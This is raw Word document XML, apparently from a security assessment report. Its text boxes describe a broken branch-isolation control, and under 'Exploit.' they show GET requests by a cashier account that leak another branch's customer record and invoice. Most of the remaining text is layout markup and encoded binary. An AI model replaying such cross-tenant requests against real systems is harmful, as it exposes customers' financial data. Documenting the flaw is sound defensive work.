                      <wps:wsp>
                        <wps:cNvPr id="25482" name="Rectangle 25482"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5223503" y="1371599"/>
                            <a:ext cx="1535381" cy="148366"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4FE4224A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>. Branch isolation was</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="878" name="Rectangle 878"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1543050"/>
                            <a:ext cx="4218456" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7E044BB1" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>modelled throughout the schema and enforced nowhere</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="879" name="Rectangle 879"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3171825" y="1543050"/>
                            <a:ext cx="43855" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="05D8CB34" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="880" name="Rectangle 880"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1809750"/>
                            <a:ext cx="570035" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="68F82DC7" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Exploit.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="881" name="Rectangle 881"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="428625" y="1809750"/>
                            <a:ext cx="2798996" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="14012BB9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> Authenticated as the Colombo cashier (</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="882" name="Shape 882"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2533650" y="1791379"/>
                            <a:ext cx="1047750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043101" y="930"/>
                                  <a:pt x="1044960" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046820" y="4645"/>
                                  <a:pt x="1047750" y="6893"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="126451"/>
                                  <a:pt x="1046820" y="128693"/>
                                  <a:pt x="1044960" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043101" y="132414"/>
                                  <a:pt x="1040855" y="133344"/>
                                  <a:pt x="1038225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>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83" name="Rectangle 883"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2560141" y="1815037"/>
                            <a:ext cx="1317859" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0BF7186D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>department_id</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> = 1</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="884" name="Rectangle 884"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3577977" y="1809750"/>
                            <a:ext cx="96419" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2170B443" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>):</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="885" name="Rectangle 885"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2203580"/>
                            <a:ext cx="6229539" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7BC03DB0" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>GET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/customers/</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>2  →</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> 200   leaked "Dilani Wickramasinghe", credit balance 78,500.00</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="886" name="Rectangle 886"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2375027"/>
                            <a:ext cx="4998119" cy="130909"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="190B707E" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>GET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/invoices/2   → 200   leaked the Kandy branch invoice INV0002</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="0910AAAE" id="Group 25897" o:spid="_x0000_s1096" style="width:510.25pt;height:204.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,25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&#10;AAA=&#10;">
                <v:shape id="Shape 836" o:spid="_x0000_s1097" style="position:absolute;top:5055;width:64801;height:7239;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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woVxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPMGLaKqCaDWKCMLqzbqH9fZo3rZdm5faZGv1128WBI/DzHzDrDatKUVDtSssKxiPIhDE&#10;qdUFZwo+z/vhHITzyBpLy6TgQQ42625nhbG2dz5Rk/hMBAi7GBXk3lexlC7NyaAb2Yo4eN+2NuiD&#10;rDOpa7wHuCnlJIpm0mDBYSHHinY5pdfk1yg4uYf/Gjxdu08uabNbJMfs8HNTqt9rt0sQnlr/Dr/a&#10;H1rBfDqD/zPhCMj1HwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBY6woVxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1445l6480126,5028r,713837l6474764,722443v-2334,967,-4763,1451,-7290,1457l19050,723900v-2526,-6,-4956,-490,-7290,-1457c9426,721475,7366,720099,5580,718319,3793,716527,2417,714468,1450,712133l,704850,,19050,1450,11751c2417,9423,3793,7361,5580,5575,7366,3786,9426,2409,11760,1445,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,723900"/>
                </v:shape>
                <v:shape id="Shape 837" o:spid="_x0000_s1098" style="position:absolute;top:20485;width:64801;height:5429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,542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Z3JxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW8SN1UoUp0DaHQEvBQ1ILXR/aZjc2+DdltEv+9WxA8DjPzDbPJRtuInjpfO1bwNktA&#10;EJdO11wp+Dl+vq5A+ICssXFMCq7kIds+P20w1W7gPfWHUIkIYZ+iAhNCm0rpS0MW/cy1xNE7u85i&#10;iLKrpO5wiHDbyHmSvEuLNccFgy19GCp/D39WwbfdX3euPl1Opk/Gc8HT/GsxVWryMuZrEIHG8Ajf&#10;24VWsFos4f9MPAJyewMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBWrZ3JxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,477,7290,1442l6480126,5028r,532860l6474764,541471v-2334,967,-4763,1451,-7290,1451l19050,542922v-2526,,-4956,-484,-7290,-1451c9426,540503,7366,539127,5580,537341,3793,535555,2417,533490,1450,531158l,523872,,19050,1450,11751c2417,9416,3793,7358,5580,5575,7366,3786,9426,2409,11760,1442,14094,477,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,542922"/>
                </v:shape>
                <v:rect id="Rectangle 852" o:spid="_x0000_s1099" style="position:absolute;width:587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772A4550" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
